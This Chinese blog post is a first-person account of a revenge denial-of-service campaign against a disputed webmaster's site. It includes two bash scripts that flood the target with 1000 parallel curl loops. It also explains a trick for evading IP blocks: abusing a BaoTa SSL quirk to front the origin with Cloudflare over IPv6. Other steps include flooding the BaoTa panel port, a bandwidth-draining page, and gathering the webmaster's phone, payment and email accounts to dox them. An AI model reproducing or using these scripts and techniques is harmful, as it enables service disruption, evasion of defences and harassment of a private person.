虽然cc攻击很可恶,但是我也是被迫无奈,目标站长是一个泼皮无赖 并且该网站并没有什么内容也不会影响站长的赚钱利益。 发生了一些纠纷,导致我非常不好想 无法去想通这个事情和理解这位站长的行为,也只有拿这个办法出一下气。
直接去购买cc攻击和ddos攻击成本太高了,我在vultr还有几百美金的余额,开通了高性能8h16g服务器(160刀一个月)不过还好vultr是可以按小时计费的。
首先我写了一个sh脚本:
#!/bin/bash
WEBSITE_URL="https://123.com/"
NUM_REQUESTS=9999999
NUM_PROCESSES=1000
for ((i=1; i<=$NUM_PROCESSES; i++)); do
echo "Starting process $i"
(
for ((j=1; j<=$NUM_REQUESTS; j++)); do
echo "Sending request $j from process $i"
curl -k -i $WEBSITE_URL
echo "------------------------------------"
done
) &
done
wait
频繁的向目标站点发送请求 办法虽然笨但是有效果 由于目标站没有防御没有cdn并且一个最基本的cc防御措施都没有 让我很快打成502。
随后我还发起了刷流量攻击,在之前我发现一个简单html页面,可以频繁的向一个图片链接发生请求来刷流量,大家直接去Google上搜索【流量消耗器】查看源代码复制下来创建一个html就能使用,原理就是向图片URLhttps://123.com/123.png疯狂发送请求,并且后面添加随机参数这样就不会调去浏览器缓存了。
但是目标站有跨域限制,于是我反向代理了目标站点,通过本地的nginx配置文件解决了跨域问题,但是貌似目标站的上行宽带太低了流量速度根本跑不起来。
几个小时后站长反应过来了,貌似加了防火墙把我的IP给屏蔽了,这套办法自然就没有用了,开始了反击我收到了vultr的邮箱 我哪台服务器收到了ddos攻击 我直接一个删除服务器收手了。
随后我越想越气,不能这么轻易放过他,转身复制目标站点源IP+8888端口,成功打开我们的国民宝塔,只不过不知道面板的具体地址。
还是一样的老办法,向IP+8888端口疯狂请求,网站正常访问 但是站长的宝塔打不开了 停止攻击也打不开了 最后我等待恢复成功 继续攻击发现又加了防御策略 攻击无效。
还是不解气啊,我就掌握站长的一个社交账号+一个域名,通过这个社交账号来到无所不知的Google+百度,找到了该站长的另外一台服务器,另外一个域名,然后邮箱账号,支付宝账号,名字,电话号码等信息。如果我把电话导入通讯录,在一些可以通过通讯录给你推荐好友的社交软件操作一下,又可以继续找到站长的其他社交平台账号,说不定还能找到照片家人等信息。
也可以在tg里面找人花点钱去开户,但是没有必要并且这不是我想要的,就算找到这个站长长什么样,多大家住何处,我也没有什么用,只是想单纯cc攻击一下撒撒气。
然后过了几天,在全球主机交流论坛刷到了这么一个帖子:

原贴内容:https://hostloc.com/thread-1204659-1-1.html 又找了一篇技术文章:https://zu1k.com/posts/tutorials/http-proxy-ipv6-pool/
我想着,刚好我可以开一台vultr服务器利用服务器的ipv6去进行cc攻击,反正ipv6管够 就算被封我重新开个不同地域的机器继续cc。
折腾了一下,目标站点不支持IPv6访问,就当我一筹莫展的时候 我突然想到了一个点子(由于上次攻击过去了好几天,不知道这个站点防御策略是否还开启,我就没有测试上次攻击的笨办法)
我可以通过cloudflare添加一个域名,然后域名解析到站点的源IP上,cloudflare的cdn是支持ipv6访问,我再使用ipv6协议去cc攻击 cloudflare可以使用ipv4协议回源给源IP,并且cloudflare的回源ipv4那么多,就算被拦截了也不会影响我继续cc。
这个时候有人会问了,你把域名解析过去开启cdn 访问域名提示未绑定域名 也只是一个html页面 cc起来也没有效果。 这个时候国民宝塔又立功了,它一直存在一个bug,就是现在你绑定一个域名开启了ssl,那么其他没有绑定的域名直接访问https,所使用的证书会是绑定那个域名的证书,并且网站显示的内容也是那个域名的内容。
我解析好域名,把SSL/TLS 加密模式为 完全 就能直接通过我这个域名的https访问到目标站点的内容,再把cloudflare的防御策略关一下,把传递源地区和传递IP都关掉。
这个时候我就可以通过上面大佬分享的技术文章,配置一下发起攻击了,但是我测试了一下 直接发起cc攻击有效果 并且不会被cloudflare拦截,并且攻击cc,目标网站也502了,代码我改良了一点点。
#!/bin/bash
WEBSITE_URL="https://123.com"
NUM_REQUESTS=9999999
NUM_PROCESSES=1000
for ((i=1; i<=$NUM_PROCESSES; i++)); do
echo "Starting process $i"
(
for ((j=1; j<=$NUM_REQUESTS; j++)); do
echo "Sending request $j from process $i"
curl -6 -k -s -o /dev/null -w "%{http_code}" $WEBSITE_URL
echo "------------------------------------"
done
) &
done
wait
修改直接ipv6发起curl请求,并且不显示网站代码信息+显示请求头,在第一个代码测试中我攻击成功发现服务器下行之能跑到几百k就跑不动了,这个办法服务器下行能跑到5m以上了,也能变向的消耗目标的流量。
我记得好像之前有一个流量联盟的说法,就是几家互联网公司产品之间通信不会计算流量,不知道cloudflare和vultr会不会计算流量。
目前还是一台8h16g服务器在cc,目标站偶然会200请求头,如果我再加一台去cc就不会这个样子了,虽然我这样的行为不好 大家也不要去模仿,出了气我也就停止了,如果再有后续,我会继续编辑。